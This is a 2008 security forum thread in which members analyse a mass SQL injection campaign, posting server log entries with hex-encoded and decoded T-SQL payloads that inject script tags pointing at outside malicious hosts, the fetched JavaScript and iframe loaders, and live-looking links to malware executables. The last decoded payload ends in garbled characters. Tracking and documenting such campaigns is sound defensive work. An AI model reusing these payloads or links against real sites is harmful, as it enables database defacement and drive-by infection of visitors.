Author Topic: SQL Injected jscript sites (Read 71614 times)

Serg · August 07, 2008, 06:35:00 pm

Quote from: Orac on August 07, 2008, 11:11:54 am

One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56 0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"
Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56 0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"
The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.

Try google to count infected forum posts...

Orac · August 09, 2008, 10:38:21 am

Log entry, with IP address obfuscated for privacy.

Code: [Select]

xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39 +0000] "GET /rrpad/pad.xml?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

decoded

Code: [Select]

xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39  0000] "GET /rrpad/pad.xml?';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

Code: [Select]

--11:24:09--  http://sdo.1000mg.cn/csrss/w.js
           => `w.js' 
Resolving sdo.1000mg.cn... 121.11.76.85
Connecting to sdo.1000mg.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

window.onerror=function(){return true;}
if(typeof(js86eus)=="undefined")
{
var js86eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/kk/kk.htm></iframe>");
}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

The iframe link to count41.51yes.com returns a 500 internal server error, both iframe links too plgou.com are active.

In all we saw this script from 236 indivdual IPs today.

Kayrac · August 09, 2008, 10:44:05 am

Code: [Select]

http://www.plgou.com/kk/rondll32.exe#version=1,0,0,1
for direct link to file, gonna run it in a sec when i get vmware back up and running

-Brian

different file here also

Code: [Select]

http://www.plgou.com/csrss/rondll32.exe

Kayrac · August 09, 2008, 01:06:15 pm

ok the KK rondll file drops 2 files in the windows font folders

the other one(csrss one) downloads these two

Code: [Select]

http://www.plgou.com/comine/sl.exe

http://www.plgou.com/comine/server.exe

more to come!

Code: [Select]

http://www.plgou.com/csrss/index.html
which lists

Code: [Select]

2008-08-08 http://www.plgou.com/comine/sss.exe
2008-08-08 http://www.plgou.com/comine/sl.exe
2008-08-08 http://www.plgou.com/comine/server.exe

Sl.exe won't run on vista, stupid vista

-Brian

JohnC · August 12, 2008, 08:20:05 pm

Thanks.

pcaccent · August 15, 2008, 02:48:13 pm

Quote

hxxp://a.mm861.com/1.js
<_SCRIPT src="hxxp://a.mm861.com/1.js"></_SCRIPT>
<_IFRAME src="hxxp://www.6980982jh.com/tt1.html" width=0 height=0></_IFRAME>
<_IFRAME src="hxxp://www.mydearsister.net/css/ad.htm" width=50 height=0></_IFRAME>
<_IFRAME src="hxxp://www.80man.com.cn/index.htm" width=0 height=0></_IFRAME>

Thank you Malzilla

Kayrac · August 15, 2008, 04:41:27 pm

from that js file above

Code: [Select]

51js.th-club.com/1794424.js
51js.th-club.com/2039774.js
51js.th-club.com/2068633.js
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2039774&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.mydearsister.net/css/ad.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2068633&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.80man.com.cn/index.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1794424&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.6980982jh.com/tt1.html
count14.51yes.com/click.aspx?id=146836447&logo=1
count14.51yes.com/count1.gif
count14.51yes.com/sa.aspx?id=146836447&refe=http%3A//www.6980982jh.com/tt1.html&location=http%3A//www.rigoogle.com/&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
count4.51yes.com/click.aspx?id=48870943&logo=1
count4.51yes.com/count1.gif
count4.51yes.com/sa.aspx?id=48870943&refe=&location=http%3A//www.6980982jh.com/tt1.html&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
icon.ajiang.net/icon_0.gif
www.6980982jh.com/favicon.ico
www.6980982jh.com/tt1.html
www.80man.com.cn/14.htm
www.80man.com.cn/4561.swf
www.80man.com.cn/WIN%209,0,47,0i.swf
www.80man.com.cn/css/css.exe
www.80man.com.cn/favicon.ico
www.80man.com.cn/flash.htm
www.80man.com.cn/index.htm
www.80man.com.cn/kkk.exe
www.80man.com.cn/office.htm
www.80man.com.cn/re10.htm
www.80man.com.cn/re11.htm
www.mydearsister.net/css/ad.htm
www.mydearsister.net/css/dadongi.asp?dadong=WIN%209,0,47,0
www.mydearsister.net/css/dadongi.swf
www.mydearsister.net/css/dd.exe
www.mydearsister.net/css/dx.exe
www.mydearsister.net/css/index.htm
www.mydearsister.net/css/kr.exe
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/mx.exe
www.mydearsister.net/css/ress.htm
www.mydearsister.net/favicon.ico
www.mydearsister.net/u.exe
www.mydearsister.netPOST/Count/Count.asp(application/x-www-form-urlencoded)
www.rigoogle.com/
www.rigoogle.com/flash.htm
www.rigoogle.com/help.exe
www.rigoogle.com/i47.swf
www.rigoogle.com/issf.html
www.rigoogle.com/office.htm
www.rigoogle.com/re10.htm
www.rigoogle.com/swfobject.js

JohnC · August 16, 2008, 09:31:51 am

Thank you.

Orac · August 16, 2008, 10:54:45 am

Sample log out of a total of 398 seperate injection attempts involving the same script within the last 24 hours, IP address obfuscated for privacy

Code: [Select]

xxx.xxx.xxx.xxx - - [16/Aug/2008:03:00:47 +0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded, IP address obfuscated for privacy

Code: [Select]

xxx.xxx.xxx.xxx- - [16/Aug/2008:03:00:47  0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Raw  
AS CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Code: [Select]

--11:18:59--  http://www3.800mg.cn/csrss/w.js
           => `w.js' 
Resolving www3.800mg.cn... 121.11.76.85 
Connecting to www3.800mg.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

SQL injection script

Code: [Select]

window.onerror=function(){return true;}
if(typeof(js8eus)=="undefined")
{
var js8eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=1 src=http://www3.800mg.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

Second iframe link

Code: [Select]

--11:21:14--  http://www3.800mg.cn/csrss/new.htm
           => `new.htm' 
Resolving www3.800mg.cn... 121.11.76.85 
Connecting to www3.800mg.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]


<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2063988.js"></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src='http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288' language='javaScript' charset='gb2312'></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

First iframe link

Code: [Select]

--11:24:21--  http://count41.51yes.com/sa.aspx
           => `sa.aspx' 
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<html>
    <head>
        <title>ÔËÐÐÊ±´íÎó</title>
        <style>
        	body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} 
        	p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        	b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        	H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        	H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        	pre {font-family:"Lucida Console";font-size: .9em}
        	.marker {font-weight: bold; color: black;text-decoration: none;}
        	.version {color: gray;}
        	.error {margin-bottom: 10px;}
        	.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>¡°/¡±Ó¦ÓÃ³ÌÐòÖÐµÄ·þÎñÆ÷´íÎó¡£<hr width=100% size=1 color=silver></H1>

            <h2> <i>ÔËÐÐÊ±´íÎó</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> ËµÃ÷: </b>·þÎñÆ÷ÉÏ³öÏÖÓ¦ÓÃ³ÌÐò´íÎó¡£´ËÓ¦ÓÃ³ÌÐòµÄµ±Ç°×Ô¶¨Òå´íÎóÉèÖÃ½ûÖ¹Ô¶³Ì²é¿´Ó¦ÓÃ³ÌÐò´íÎóµÄÏêÏ¸ÐÅÏ¢(³öÓÚ°²È«ÔÒò)¡£µ«¿ÉÒÔÍ¨¹ýÔÚ±¾µØ·þÎñÆ÷¼ÆËã»úÉÏÔËÐÐµÄä¯ÀÀÆ÷²é¿´¡£
            <br><br>

            <b>ÏêÏ¸ÐÅÏ¢:</b> ÈôÒªÊ¹ËûÈËÄÜ¹»ÔÚÔ¶³Ì¼ÆËã»úÉÏ²é¿´´ËÌØ¶¨´íÎóÐÅÏ¢µÄÏêÏ¸ÐÅÏ¢£¬ÇëÔÚÎ»ÓÚµ±Ç° Web Ó¦ÓÃ³ÌÐò¸ùÄ¿Â¼ÏÂµÄ¡°web.config¡±ÅäÖÃÎÄ¼þÖÐ´´½¨Ò»¸ö &lt;customErrors&gt; ±ê¼Ç¡£È»ºóÓ¦½«´Ë &lt;customErrors&gt; ±ê¼ÇµÄ¡°mode¡±ÊôÐÔÉèÖÃÎª¡°Off¡±¡£<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config ÅäÖÃÎÄ¼þ --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>×¢ÊÍ:</b> Í¨¹ýÐÞ¸ÄÓ¦ÓÃ³ÌÐòµÄ &lt;customErrors&gt; ÅäÖÃ±ê¼ÇµÄ¡°defaultRedirect¡±ÊôÐÔ£¬Ê¹Ö®Ö¸Ïò×Ô¶¨Òå´íÎóÒ³µÄ URL£¬¿ÉÒÔÓÃ×Ô¶¨Òå´íÎóÒ³Ìæ»»Ëù¿´µ½µÄµ±Ç°´íÎóÒ³¡£<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config ÅäÖÃÎÄ¼þ --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>

Secondary iframe

Code: [Select]

--11:29:33--  http://js.users.51.la/2063988.js
           => `2063988.js' 
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

document.write ('<a href="http://www.51.la/?2063988" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters. 
window.onerror=function(){return true};
document.write ('<script>var a3988tf="51la";var a3988pu="";var a3988pf="51la";var a3988su=window.location;var a3988sf=document.referrer;var a3988of="";var a3988op="";var a3988ops=1;var a3988ot=1;var a3988d=new Date();var a3988color="";if (navigator.appName=="Netscape"){a3988color=screen.pixelDepth;} else {a3988color=screen.colorDepth;}<\/script><script>a3988tf=top.document.referrer;<\/script><script>a3988pu =window.parent.location;<\/script><script>a3988pf=window.parent.document.referrer;<\/script><script>a3988ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3988ops=(a3988ops==null)?1: (parseInt(unescape((a3988ops)[2]))+1);var a3988oe =new Date();a3988oe.setTime(a3988oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3988ops+ ";path=/;expires="+a3988oe.toGMTString();a3988ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3988ot==null){a3988ot=1;}else{a3988ot=parseInt(unescape((a3988ot)[2])); a3988ot=(a3988ops==1)?(a3988ot+1):(a3988ot);}a3988oe.setTime(a3988oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3988ot+";path=/;expires="+a3988oe.toGMTString();<\/script><script>a3988of=a3988sf;if(a3988pf!=="51la"){a3988of=a3988pf;}if(a3988tf!=="51la"){a3988of=a3988tf;}a3988op=a3988pu;try{lainframe}catch(e){a3988op=a3988su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2063988&tpages=\'+a3988ops+\'&ttimes=\'+a3988ot+\'&tzone=\'+(0-a3988d.getTimezoneOffset()/60)+\'&tcolor=\'+a3988color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3988of)+\'&vpage=\'+escape(a3988op)+\'" \/>\');<\/script>');

Script link

Code: [Select]

--11:35:17--  http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288
           => `stat.php?id=1005288&web_id=1005288' 
Resolving s135.cnzz.com... 219.232.241.139
Connecting to s135.cnzz.com[219.232.241.139]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

function gv_cnzz(of){
	var es = document.cookie.indexOf(";",of);
	if(es==-1) es=document.cookie.length;
	return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
	var arg=n+"=";
	var alen=arg.length;
	var clen=document.cookie.length;
	var i=0;
	while(i<clen){
	var j=i+alen;
	if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
	i=document.cookie.indexOf(" ",i)+1;
	if(i==0)	break;
	}
	return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.38678100 1218883460';
var cnzz_a=gc_cnzz("cnzz_a1005288");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1005288" target=_blank title="Õ¾³¤Í³¼Æ">Õ¾³¤Í³¼Æ</a>');
document.write('<img src="http://222.77.187.108/stat.htm?id=1005288'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1005288="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";

JohnC · August 16, 2008, 05:29:36 pm

Thanks.

Orac · August 17, 2008, 10:59:07 am

Further to my post August 16, 2008 we had a total of 2,051 injection attempts involving this same script in the last 24 hours

Orac · August 18, 2008, 09:26:15 am

With reference to my post August 16, 2008 we had a total of 1552 injection attempts involving this same script in the last 24 hours.

The link is now returning a 500 internal server error.

Orac · August 20, 2008, 09:59:36 am

New SQL injection attempt from sdo.1000mg.cn/csrss/w.js

Original encoded form

Code: [Select]

0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207!
372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded

Code: [Select]

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script 7!
7&3Ò&‡GG¢ò÷6FòãÖræ6âö77'72÷ræ§2#ãÂ÷67&—CãÂÒÒrrr”dUD4‚äU…Be$ôÒF&ÆUô7W'6÷"”åDòBÄ2TäB4Äõ4RF&ÆUô7W'6÷"DTÄÄô4DRF&ÆUô7W'6÷2

The link returns a 500 Internal server error.

Orac · August 21, 2008, 11:11:43 am

